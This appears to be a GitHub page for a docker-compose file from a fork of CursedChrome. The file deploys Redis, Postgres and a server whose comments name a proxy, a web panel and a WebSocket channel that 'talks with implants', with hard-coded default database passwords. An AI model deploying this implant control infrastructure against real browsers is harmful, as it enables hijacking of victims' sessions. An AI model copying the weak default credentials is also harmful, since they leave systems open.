forked from mandatoryprogrammer/CursedChrome
-
Notifications
You must be signed in to change notification settings - Fork 2
/
docker-compose.yaml
36 lines (36 loc) · 923 Bytes
/
docker-compose.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
version: '3.2'
services:
redis:
image: "redis:alpine"
command: redis-server --appendonly no
db:
image: postgres
restart: always
environment:
POSTGRES_PASSWORD: cursedchrome
POSTGRES_USER: cursedchrome
POSTGRES_DB: cursedchrome
cursedchrome:
build: .
volumes:
- ./ssl:/work/cassl
depends_on:
- db
- redis
environment:
DATABASE_NAME: cursedchrome
DATABASE_USER: cursedchrome
DATABASE_PASSWORD: cursedchrome
DATABASE_HOST: db
REDIS_HOST: redis
BCRYPT_ROUNDS: 10
BAK_SERVER: "http://localhost:8080/xxxx"
ports:
- "127.0.0.1:8080:8080" # Proxy server
- "127.0.0.1:4343:4343" # WebSocket server (talks with implants)
- "127.0.0.1:8118:8118" # Web panel
healthcheck:
test: [ "CMD", "curl", "-f", "http://localhost:8118" ]
interval: 30s
timeout: 10s
retries: 5